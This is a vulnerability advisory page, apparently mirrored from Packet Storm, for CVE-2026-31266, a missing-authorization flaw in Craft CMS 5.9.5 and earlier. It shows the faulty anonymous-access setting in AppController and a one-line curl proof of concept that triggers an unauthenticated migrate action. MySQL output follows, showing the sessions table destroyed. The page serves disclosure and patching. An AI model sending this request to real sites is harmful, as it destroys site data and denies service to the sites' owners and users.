Vulners
Lucene search
๐ Craft CMS 5.9.5 Missing Authorization / Denial of Service
๐๏ธย 05 Jun 2026ย 00:00:00Reported byย Mohammed Al-shehriTypeย 
ย packetstorm๐ย packetstorm.news๐ย 48ย Views
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | cms-security-poc | 4 Feb 202621:01 | โ | githubexploit |
 | CVE-2026-31266 | 27 May 202600:00 | โ | attackerkb |
 | CVE-2026-31266 | 5 Jun 202615:00 | โ | circl |
 | Craft CMS ๅฎๅ จๆผๆด | 27 May 202600:00 | โ | cnnvd |
 | CVE-2026-31266 | 27 May 202600:00 | โ | cve |
 | CVE-2026-31266 | 27 May 202600:00 | โ | cvelist |
 | CVE-2026-31266 | 27 May 202615:16 | โ | nvd |
| ๐ Craft CMS 5.9.5 Missing Authorization / Authentication Bypass | 11 Jun 202600:00 | โ | packetstorm |
 | PT-2026-43997 | 27 May 202600:00 | โ | ptsecurity |
 | CVE-2026-31266 | 5 Jun 202619:45 | โ | redhatcve |
10
# CVE-2026-31266 - Craft CMS Missing Authorization
## CVE Information
| Field | Value |
|-------|-------|
| **CVE ID** | CVE-2026-31266 |
| **Vendor** | Pixel & Tonic |
| **Product** | Craft CMS |
| **Affected Versions** | <= 5.9.5 |
| **CWE** | CWE-862 (Missing Authorization) |
| **CVSS** | 7.3 (High) |
| **Security Researcher** | 0xRIXET |
## Evidence Contents
- `screenshots/` - Proof of Concept demonstrations
## Vulnerability
- **Type:** Missing Authorization
- **Impact:** Authentication Bypass
- **Vendor:** Craft CMS
- **Status:** CVE-2026-31266
## Vulnerable Code
**File:** `src/controllers/AppController.php`
**Lines 65-68:**
```php
protected array|bool|int $allowAnonymous = [
'migrate' => self::ALLOW_ANONYMOUS_LIVE | self::ALLOW_ANONYMOUS_OFFLINE,
];
```
## Proof of Concept
```bash
# With allowAdminChanges=false
curl -X POST "http://target/actions/app/migrate"
```
## Evidence
### Before Attack:
```sql
mysql> SELECT COUNT(*) FROM sessions;
+----------+
| COUNT(*) |
+----------+
| 0 |
+----------+
```
### After Attack:
```sql
mysql> SELECT COUNT(*) FROM sessions;
ERROR 1146 (42S02): Table 'sessions' doesn't exist
```
## References
- [Craft CMS Repository](https://github.com/craftcms/cms)
- [Craft Security Documentation](https://craftcms.com/knowledge-base/securing-craft)
- [NVD Entry](https://nvd.nist.gov/vuln/detail/CVE-2026-31266)
## Contact
- **Security Researcher:** 0xRIXET | Mohammed Al-shehri
- **Twitter | X :** @0xRIXET
- **Email:** [email protected]Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Jun 2026 00:00Current
5.5Medium risk
Vulners AI Score5.5
CVSS 3.17.3
EPSS0.00283
SSVC